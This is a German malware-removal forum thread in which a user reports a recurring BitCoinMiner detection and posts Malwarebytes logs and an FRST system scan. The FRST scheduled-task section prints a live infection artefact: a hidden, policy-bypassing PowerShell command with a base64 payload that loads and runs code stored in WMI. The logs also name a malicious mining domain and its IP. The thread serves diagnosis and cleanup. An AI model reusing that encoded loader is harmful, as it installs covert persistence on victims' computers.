Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Windows 10: RiskWare.BitCoinMiner bei jedem Neustart

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Thema geschlossen
Alt 14.01.2021, 16:25   #1
Kadsze
 
Windows 10: RiskWare.BitCoinMiner bei jedem Neustart - Standard

Windows 10: RiskWare.BitCoinMiner bei jedem Neustart



Hallo,
bei jedem Neustart schlägt bei mir Malwarebytes an. Einmal wegen RiskWare.BitCoinMiner und einmal "polarbearminingsystems.com".


Vielen Dank für die Hilfe schonmal

Malwarebytes
Code:
ATTFilter
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Datum des Schutzereignisses: 14.01.21
Uhrzeit des Schutzereignisses: 16:16
Protokolldatei: 6921a034-567b-11eb-856d-7085c2b505cd.json

-Softwaredaten-
Version: 4.3.0.98
Komponentenversion: 1.0.1130
Version des Aktualisierungspakets: 1.0.35735
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 10 (Build 19041.685)
CPU: x64
Dateisystem: NTFS
Benutzer: System

-Einzelheiten zu blockierter Schadsoftware-
Datei: 1
RiskWare.BitCoinMiner, C:\Windows\Performance\B5C28570-CD05-0000-0000-000000000000\Services.exe, In Quarantäne, 1710, 628313, 1.0.35735, , ame, , BF8014F7E0BD07C37610FCD30B4CC1D6, A534F7E01F36A52C9E2007A347BAD5B9094187C6C890F5F86DA483CEA3D54B43


(end)
         
Code:
ATTFilter
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Datum des Schutzereignisses: 14.01.21
Uhrzeit des Schutzereignisses: 16:15
Protokolldatei: 67da6239-567b-11eb-8e66-7085c2b505cd.json

-Softwaredaten-
Version: 4.3.0.98
Komponentenversion: 1.0.1130
Version des Aktualisierungspakets: 1.0.35735
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 10 (Build 19041.685)
CPU: x64
Dateisystem: NTFS
Benutzer: System

-Einzelheiten zu blockierten Websites-
Bösartige Website: 1
, C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Blockiert, -1, -1, 0.0.0, , 

-Website-Daten-
Kategorie: Trojaner
Domäne: polarbearminingsystems.com
IP-Adresse: 82.221.136.4
Port: 80
Typ: Ausgehend
Datei: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe



(end)
         
FRST
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021
durchgeführt von Teemida (Administrator) auf DESKTOP-V80PEH8 (14-01-2021 16:19:57)
Gestartet von C:\Users\dkads\Downloads
Geladene Profile: Teemida
Platform: Windows 10 Pro N Version 20H2 19042.685 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\amdow.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0361901.inf_amd64_204a65b18f2a904a\B361909\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\u0361901.inf_amd64_204a65b18f2a904a\B361909\atiesrxx.exe
(Code Sector -> ) C:\Program Files\TeraCopy\TeraCopyService.exe
(F.lux Software LLC -> f.lux Software LLC) C:\Users\dkads\AppData\Local\FluxSoftware\Flux\flux.exe
(Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert] C:\Program Files\Classic Shell\ClassicStartMenu.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\spaceman.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.) C:\Windows\System32\amdfendrsr.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Users\dkads\AppData\Local\Mozilla Firefox\firefox.exe <7>
(Winstep Software Technologies) [Datei ist nicht signiert] [Datei wird verwendet] C:\Program Files (x86)\Winstep\Nexus.exe
(Winstep Software Technologies) [Datei ist nicht signiert] C:\Program Files (x86)\Winstep\WsxService.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Classic Start Menu] => C:\Program Files\Classic Shell\ClassicStartMenu.exe [163640 2018-07-15] (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert]
HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\Run: [Discord] => C:\Users\dkads\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3411232 2020-12-21] (Valve -> Valve Corporation)
HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\Run: [f.lux] => C:\Users\dkads\AppData\Local\FluxSoftware\Flux\flux.exe [1469968 2020-06-17] (F.lux Software LLC -> f.lux Software LLC)
HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\Run: [Nexus] => C:\Program Files (x86)\Winstep\Nexus.exe [18012288 2020-10-28] (Winstep Software Technologies) [Datei ist nicht signiert] [Datei wird verwendet]
HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\Run: [PeerBlock] => C:\Program Files\PeerBlock\peerblock.exe [2513992 2014-01-14] (PeerBlock, LLC -> PeerBlock, LLC)
HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program Files\BraveSoftware\Brave-Browser\Application\87.1.18.78\Installer\chrmstp.exe [2021-01-09] (Brave Software, Inc. -> Brave Software, Inc.)
BootExecute: autocheck autochk * sdnclean64.exe

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0FC0E545-9E08-4812-A138-80DA43533042} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [69304 2020-12-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {100DF89F-D663-43C5-A41D-01C35A2D35E6} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162384 2021-01-09] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {2E197BA6-B18C-4AA3-8769-6A9D046D37C7} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2574429152-671371520-428654442-1002 => C:\Users\dkads\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {51520DAA-76BC-4321-B94B-BC5E1B16966D} - System32\Tasks\Driver Booster SkipUAC (dkads) => C:\Program Files (x86)\IObit\Driver Booster\8.2.0\DriverBooster.exe [8147216 2020-12-30] (IObit Information Technology -> IObit)
Task: {5F48D8AC-841A-458F-8059-F09A20D16B9C} - System32\Tasks\Driver Booster SkipUAC (Teemida) => C:\Program Files (x86)\IObit\Driver Booster\8.2.0\DriverBooster.exe [8147216 2020-12-30] (IObit Information Technology -> IObit)
Task: {63DE2367-B9F7-49F5-A6A0-799CCD1A6972} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2574429152-671371520-428654442-500 => C:\Users\dkads\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {73630070-EAF1-493B-A556-CC2A0EFAB210} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1710472 2020-12-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {94C77F89-2B54-47E4-AF56-94BC06A36B34} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\8.2.0\AutoUpdate.exe [2268432 2020-12-23] (IObit Information Technology -> IObit)
Task: {9DB440B8-D809-4CDC-B7C9-517D21E21457} - System32\Tasks\Microsoft\Windows\PowerShell\B5C28570-CD05-0000-0000-000000000000 => PowerShell.exe -NoP -NonI -EP ByPass -Win Hidden -E WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEcAZQB0AC0AVwBNAEkATwBiAGoAZQBjAHQAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAFMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABMAG8AZwBGAGkAbABlAEUAdgBlAG4AdABDAG8AbgBzAHUAbQBlAHIAIAB8ACAAdwBoAGUAcgBlAC0AbwBiAGoAZQBjAHQAIAB7ACQAXwAuAE4AYQBtAGUAIAAtAEwAaQBrAGUAIAAnAEUATABEACcAfQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBlAHgAcABhAG4AZABwAHIAbwBwAGUAcgB0AHkAIABUAGUAeAB0ACAAKQAuAHMAcABsAGkAdAAoACIAIAAiACkAKQAgAHwAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4A
Task: {ACE70E78-5D27-43BB-9B5C-3C44CAE6FC6D} - System32\Tasks\Mozilla\Firefox Default Browser Agent BFA3389A466559AE => C:\Users\dkads\AppData\Local\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-05] (Mozilla Corporation -> Mozilla Foundation)
Task: {C0D4B299-BB28-401F-959D-8E75AF7DA284} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2020-12-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {C61C33D3-3001-4FE0-8BA7-DC52C4F8AC7A} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-08] (Goversoft LLC -> Goversoft LLC)
Task: {D5561F93-A28B-43E1-9D2F-5A542B1F7B53} - System32\Tasks\AMDLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1710472 2020-12-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {F957BDD7-2070-437A-AB4B-B0E8DFFA182C} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162384 2021-01-09] (Brave Software, Inc. -> BraveSoftware Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{50594e2e-c589-449b-b752-c679dc4f4806}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{c8cfbec4-1fa5-47f8-9bd9-3422f5803643}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{e79156cc-99ef-41a8-9400-a6b16542eb5e}: [DhcpNameServer] 10.18.0.1

Edge: 
======
Edge Profile: C:\Users\dkads\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-12]

FireFox:
========
FF DefaultProfile: 79bphwp0.default
FF ProfilePath: C:\Users\dkads\AppData\Roaming\Mozilla\Firefox\Profiles\79bphwp0.default [2021-01-08]
FF ProfilePath: C:\Users\dkads\AppData\Roaming\Mozilla\Firefox\Profiles\0flomldi.default-release-1610634788928 [2021-01-14]
FF Extension: (HTTPS Everywhere) - C:\Users\dkads\AppData\Roaming\Mozilla\Firefox\Profiles\0flomldi.default-release-1610634788928\Extensions\https-everywhere@eff.org.xpi [2021-01-14]
FF Extension: (Decentraleyes) - C:\Users\dkads\AppData\Roaming\Mozilla\Firefox\Profiles\0flomldi.default-release-1610634788928\Extensions\jid1-BoFifL9Vbdl2zQ@jetpack.xpi [2021-01-14]
FF Extension: (uBlock Origin) - C:\Users\dkads\AppData\Roaming\Mozilla\Firefox\Profiles\0flomldi.default-release-1610634788928\Extensions\uBlock0@raymondhill.net.xpi [2021-01-14]
FF Extension: (ClearURLs) - C:\Users\dkads\AppData\Roaming\Mozilla\Firefox\Profiles\0flomldi.default-release-1610634788928\Extensions\{74145f27-f039-47ce-a470-a662b129930a}.xpi [2021-01-14]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2020-11-23] (FOXIT SOFTWARE INC. -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.cpdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2020-11-23] (FOXIT SOFTWARE INC. -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2020-11-23] (FOXIT SOFTWARE INC. -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2020-11-23] (FOXIT SOFTWARE INC. -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2020-11-23] (FOXIT SOFTWARE INC. -> Foxit Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation ->  Microsoft Corporation)

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S2 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162384 2021-01-09] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162384 2021-01-09] (Brave Software, Inc. -> BraveSoftware Inc.)
S4 FoxitReaderUpdateService; C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitReaderUpdateService.exe [2357936 2020-11-23] (FOXIT SOFTWARE INC. -> Foxit Software Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7456464 2021-01-14] (Malwarebytes Inc -> Malwarebytes)
S3 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [101184 2020-06-04] (ProtonVPN AG -> )
S3 ProtonVPN Update Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.UpdateService.exe [61760 2020-06-04] (ProtonVPN AG -> )
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2021-01-08] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeraCopyService; C:\Program Files\TeraCopy\TeraCopyService.exe [112944 2020-08-15] (Code Sector -> )
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2021-01-08] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2021-01-08] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 Winstep Xtreme Service; C:\Program Files (x86)\Winstep\WsxService.exe [777216 2019-10-29] (Winstep Software Technologies) [Datei ist nicht signiert]
S3 WiseBootAssistant; C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe [662472 2020-12-04] (Lespeed Technology Co., Ltd -> WiseCleaner.com)

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 AMDXE; C:\Windows\System32\drivers\amdxe.sys [62056 2020-07-27] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153312 2021-01-14] (Malwarebytes Corporation -> Malwarebytes)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [220160 2021-01-14] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [19912 2021-01-14] (Microsoft Windows Early Launch Anti-Malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [197792 2021-01-14] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [77496 2021-01-14] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [248968 2021-01-14] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [139424 2021-01-14] (Malwarebytes Inc -> Malwarebytes)
S3 ProtonVPNSplitTunnel; C:\Program Files (x86)\Proton Technologies\ProtonVPN\x64\Win10\ProtonVPN.SplitTunnelDriver.sys [31584 2020-06-03] (Microsoft Windows Hardware Compatibility Publisher -> Proton Technologies AG)
R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R2 SSGDIO; C:\Windows\SysWOW64\DRIVERS\ssgdio64.sys [14608 2021-01-08] (ATI Technologies, Inc -> ATI Technologies Inc.)
R3 tapprotonvpn; C:\Windows\System32\drivers\tapprotonvpn.sys [49008 2020-04-06] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project)
S3 WdBoot; C:\Windows\system32\drivers\wd\WdBoot.sys [48536 2021-01-08] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\wd\WdFilter.sys [429296 2021-01-08] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [70896 2021-01-08] (Microsoft Windows -> Microsoft Corporation)
S3 WiseHDInfo; C:\Windows\WiseHDInfo64.dll [33864 2021-01-08] (Beijing Lang Xingda Network Technology Co., Ltd -> wisecleaner.com)
S3 WiseRegNotify; C:\Windows\WiseRegNotify.sys [51272 2021-01-08] (Beijing Lang Xingda Network Technology Co., Ltd -> WiseCleaner.com)
U3 dmwappushsvc; kein ImagePath

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-14 16:16 - 2021-01-14 16:16 - 000000801 _____ C:\Users\dkads\Desktop\Malwarebytes2.txt
2021-01-14 16:16 - 2021-01-14 16:16 - 000000752 _____ C:\Users\dkads\Desktop\Malwarebytes.txt
2021-01-14 16:15 - 2021-01-14 16:15 - 000077496 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2021-01-14 16:14 - 2021-01-14 16:14 - 000197792 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2021-01-14 16:14 - 2021-01-14 16:14 - 000139424 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2021-01-14 16:13 - 2021-01-14 16:13 - 002281472 _____ (Farbar) C:\Users\dkads\Downloads\FRST64(1).exe
2021-01-14 16:07 - 2021-01-14 16:07 - 000248968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2021-01-14 16:07 - 2021-01-14 16:07 - 000220160 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2021-01-14 16:07 - 2021-01-14 16:07 - 000002033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2021-01-14 16:07 - 2021-01-14 16:07 - 000000000 ____D C:\Users\dkads\AppData\Local\mbam
2021-01-14 16:06 - 2021-01-14 16:06 - 002086424 _____ (Malwarebytes) C:\Users\dkads\Downloads\MBSetup.exe
2021-01-14 16:06 - 2021-01-14 16:06 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2021-01-14 16:06 - 2021-01-14 16:06 - 000019912 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2021-01-14 16:06 - 2021-01-14 16:06 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-14 16:06 - 2021-01-14 16:06 - 000000000 ____D C:\Program Files\Malwarebytes
2021-01-14 16:00 - 2021-01-14 16:00 - 000000000 ____D C:\ProgramData\mb3migration
2021-01-14 15:59 - 2021-01-14 15:59 - 011289960 _____ C:\Users\dkads\Downloads\mb-support-1.8.0.848.exe
2021-01-14 15:59 - 2021-01-14 15:59 - 002281472 _____ (Farbar) C:\Users\dkads\Downloads\FRSTEnglish.exe
2021-01-14 15:46 - 2021-01-14 15:49 - 000043990 _____ C:\Users\dkads\Downloads\Addition.txt
2021-01-14 15:46 - 2021-01-14 15:46 - 000042600 _____ C:\Users\dkads\Downloads\Shortcut.txt
2021-01-14 15:44 - 2021-01-14 16:20 - 000016548 _____ C:\Users\dkads\Downloads\FRST.txt
2021-01-14 15:44 - 2021-01-14 16:20 - 000000000 ____D C:\FRST
2021-01-14 15:44 - 2021-01-14 15:44 - 002281472 _____ (Farbar) C:\Users\dkads\Downloads\FRST64.exe
2021-01-14 15:38 - 2021-01-14 15:38 - 000000000 ___HD C:\$SysReset
2021-01-14 15:34 - 2021-01-14 16:07 - 000000000 ____D C:\ProgramData\HitmanPro
2021-01-14 15:30 - 2021-01-14 15:30 - 011431000 _____ (SurfRight B.V.) C:\Users\dkads\Downloads\hitmanpro_x64.exe
2021-01-14 15:28 - 2021-01-14 15:29 - 015012440 _____ (ESET spol. s r.o.) C:\Users\dkads\Downloads\ESETOnlineScanner_DEU.exe
2021-01-14 15:28 - 2021-01-14 15:29 - 000000798 _____ C:\Users\dkads\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ESET Online Scanner.lnk
2021-01-14 15:28 - 2021-01-14 15:28 - 000472016 _____ (Bleeping Computer, LLC) C:\Users\dkads\Downloads\sc-cleaner.exe
2021-01-14 15:28 - 2021-01-14 15:28 - 000000000 ____D C:\Users\dkads\AppData\Local\ESET
2021-01-14 15:26 - 2021-01-14 15:26 - 008458096 _____ (Malwarebytes) C:\Users\dkads\Downloads\adwcleaner_8.0.9.exe
2021-01-14 15:25 - 2021-01-14 15:26 - 000000000 ____D C:\AdwCleaner
2021-01-14 15:25 - 2021-01-14 15:25 - 007025360 _____ (Malwarebytes) C:\Users\dkads\Downloads\adwcleaner_7.3.exe
2021-01-14 15:23 - 2021-01-14 15:23 - 000000085 _____ C:\Windows\wininit.ini
2021-01-14 15:23 - 2021-01-14 15:23 - 000000000 ____D C:\Windows\system32\Tasks\Safer-Networking
2021-01-14 15:15 - 2021-01-14 15:15 - 000000000 ____D C:\Program Files\Windows Portable Devices
2021-01-14 15:15 - 2021-01-14 15:15 - 000000000 ____D C:\Program Files\Windows Multimedia Platform
2021-01-14 15:15 - 2021-01-14 15:15 - 000000000 ____D C:\Program Files (x86)\Windows Portable Devices
2021-01-14 15:15 - 2021-01-14 15:15 - 000000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2021-01-14 15:11 - 2019-12-06 21:32 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2021-01-14 15:11 - 2019-12-06 21:30 - 000184320 _____ (Fraunhofer Institut Integrierte Schaltungen IIS) C:\Windows\system32\l3codecp.acm
2021-01-14 15:11 - 2019-12-06 21:29 - 000093184 _____ (Fraunhofer Institut Integrierte Schaltungen IIS) C:\Windows\system32\l3codeca.acm
2021-01-14 15:11 - 2019-12-06 19:55 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.tlb
2021-01-14 15:11 - 2019-12-06 19:55 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\amcompat.tlb
2021-01-14 15:11 - 2019-12-06 19:49 - 000005632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2021-01-14 15:11 - 2019-12-06 19:48 - 000189440 _____ (Fraunhofer Institut Integrierte Schaltungen IIS) C:\Windows\SysWOW64\l3codecp.acm
2021-01-14 15:11 - 2019-12-06 19:47 - 000069120 _____ (Fraunhofer Institut Integrierte Schaltungen IIS) C:\Windows\SysWOW64\l3codeca.acm
2021-01-14 15:11 - 2019-12-06 18:27 - 000044032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.tlb
2021-01-14 15:11 - 2019-12-06 18:27 - 000018944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\amcompat.tlb
2021-01-14 15:11 - 2019-12-06 18:24 - 000249856 _____ (Gracenote, Inc.) C:\Windows\SysWOW64\gnsdk_fp.dll
2021-01-14 15:11 - 2019-10-15 13:49 - 000316640 _____ C:\Windows\WMSysPr9.prx
2021-01-14 15:00 - 2021-01-14 16:04 - 000000000 ____D C:\Users\dkads\AppData\Local\CrashDumps
2021-01-14 14:46 - 2021-01-14 15:36 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2021-01-14 14:46 - 2021-01-14 15:23 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2021-01-14 14:46 - 2021-01-14 14:46 - 000000000 ____D C:\Users\dkads\AppData\Local\Safer-Networking Ltd
2021-01-14 14:44 - 2021-01-14 14:44 - 069300040 _____ (Safer-Networking Ltd. ) C:\Users\dkads\Downloads\spybotsd-2.8.68.0.exe
2021-01-14 14:32 - 2021-01-14 14:33 - 103322379 _____ C:\Users\dkads\Downloads\Windows_MediaFeaturePack_x64_1903_V1.msu
2021-01-14 14:20 - 2021-01-14 14:20 - 000000000 ____D C:\Program Files\GTAV
2021-01-14 13:04 - 2021-01-14 13:04 - 000000000 ____D C:\Users\dkads\AppData\Roaming\HelloGames
2021-01-14 12:56 - 2021-01-14 12:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\No Man's Sky [GOG.com]
2021-01-14 12:55 - 2021-01-14 12:55 - 000000000 ____D C:\ProgramData\GOG.com
2021-01-13 14:56 - 2021-01-13 14:56 - 000000000 ____D C:\Users\dkads\AppData\Roaming\Clockwork Origins
2021-01-13 14:55 - 2021-01-13 14:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Clockwork Origins
2021-01-13 14:55 - 2021-01-13 14:55 - 000000000 ____D C:\Program Files\Clockwork Origins
2021-01-13 14:51 - 2021-01-13 14:51 - 000000000 ____D C:\Users\dkads\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2021-01-13 11:54 - 2021-01-13 11:54 - 000267536 _____ C:\Windows\system32\FNTCACHE.DAT
2021-01-12 16:18 - 2021-01-12 16:18 - 000003192 _____ C:\Windows\system32\Tasks\PrivaZer_SkipUAC
